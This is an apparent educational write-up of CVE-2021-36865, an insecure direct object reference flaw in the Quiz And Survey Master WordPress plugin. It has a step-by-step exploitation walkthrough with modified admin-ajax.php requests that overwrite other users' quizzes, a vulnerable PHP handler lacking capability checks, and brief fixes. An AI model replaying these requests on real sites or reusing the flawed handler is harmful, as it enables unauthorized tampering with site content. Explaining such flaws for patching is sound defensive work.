WordPress has long been the platform of choice for bloggers, small businesses, and web developers looking for flexible plugin options. But with popularity comes risk—vulnerabilities are discovered all the time. One such case is CVE-2021-36865, a security flaw that affects the popular Quiz And Survey Master plugin developed by ExpressTech. In this article, we’ll break down what this Insecure Direct Object Reference (IDOR) vulnerability means, how it works, and show simplified code and exploitation examples.

> Quick Summary:  
> CVE-2021-36865 allows any authenticated WordPress user (even subscribers) to change quizzes’ content by directly manipulating object identifiers in HTTP requests.

Affected Versions: ≤ 7.3.4

- CVE Reference: NVD - CVE-2021-36865
- Official Advisory: WPScan Advisory

What is IDOR?

IDOR occurs when user-supplied input is used to directly access objects (like database records, files, etc.) without adequate authorization checks. If an app relies only on identifiers passed from the user without confirming they have permission to use them, an attacker can often read or modify data belonging to others.

How the Vulnerability Works

In the case of QSM ≤ 7.3.4, a lack of proper authorization in certain AJAX actions lets _any authenticated user_ (even those with the lowest permissions) submit changes to quiz content.

AJAX actions are used by the plugin to handle background operations.

- A plugin endpoint like /wp-admin/admin-ajax.php processes requests like updating a quiz question.

Example Exploitation

Let’s walk through a simple step-by-step of how an attacker could exploit this vulnerability.

1. Identify AJAX Endpoint

Most AJAX requests in WordPress go through /wp-admin/admin-ajax.php. The QSM plugin registers actions such as qsm_save_question.

2. Capture a Legitimate AJAX Request

First, log in as a regular user (e.g., “subscriber”) and use your browser’s Developer Tools (Network Tab) during a quiz edit action. Find a POST request to /wp-admin/admin-ajax.php similar to:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: vulnerable-site.com
Cookie: [Your Session Cookie]
Content-Type: application/x-www-form-urlencoded

action=qsm_save_question
quiz_id=5
question_id=3
question_name=What's+the+capital+of+France%3F
question_content=Paris
...

3. Modify the Request

Change quiz_id and question_id to target a quiz and question you don’t own or shouldn’t be able to edit:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: vulnerable-site.com
Cookie: [Your Session Cookie]
Content-Type: application/x-www-form-urlencoded

action=qsm_save_question
quiz_id=12       <-- Target a different quiz!
question_id=43   <-- Target a question in that quiz!
question_name=What+is+your+password%3F
question_content=Hacked+by+me

4. Submit the Request

After sending, verify the content of the targeted quiz has changed—proving unauthorized access.

(This is a simplified example based on public writeups and QSM’s source code before the fix)

// Vulnerable: Only checks if user is logged in, not if they can edit the quiz
add_action('wp_ajax_qsm_save_question', 'qsm_save_question_callback');

function qsm_save_question_callback() {
    if (!is_user_logged_in()) {
        wp_send_json_error('Not authorized');
    }

    $quiz_id = intval($_POST['quiz_id']);
    $question_id = intval($_POST['question_id']);
    $question_content = $_POST['question_content'];

    // No check whether current user can edit $quiz_id!
    update_post_meta($question_id, 'qsm_question_content', $question_content);

    wp_send_json_success('Question saved');
}

Nonce checks: Enforcing WordPress security nonces.

- Limiting endpoints: Only allowing users with appropriate capabilities (e.g., edit_posts or custom quiz capability) to access AJAX actions involving edits.

References & Further Reading

- CVE-2021-36865 on NIST’s NVD
- WPScan Advisory: QSM <= 7.3.4 - Authenticated IDOR to Quiz Content Change
- Quiz and Survey Master on WordPress.org

TL;DR

CVE-2021-36865 is a classic case of insecure object reference in WordPress plugins. If you run Quiz And Survey Master, update immediately—or risk having your quizzes rewritten by anyone with an account.

Keep plugins updated, don’t trust user input, and always check permissions!

*This article is for educational purposes. Always get proper authorization before testing vulnerabilities.*

Timeline

Published on: 09/30/2022 19:15:00 UTC
Last modified on: 10/04/2022 18:28:00 UTC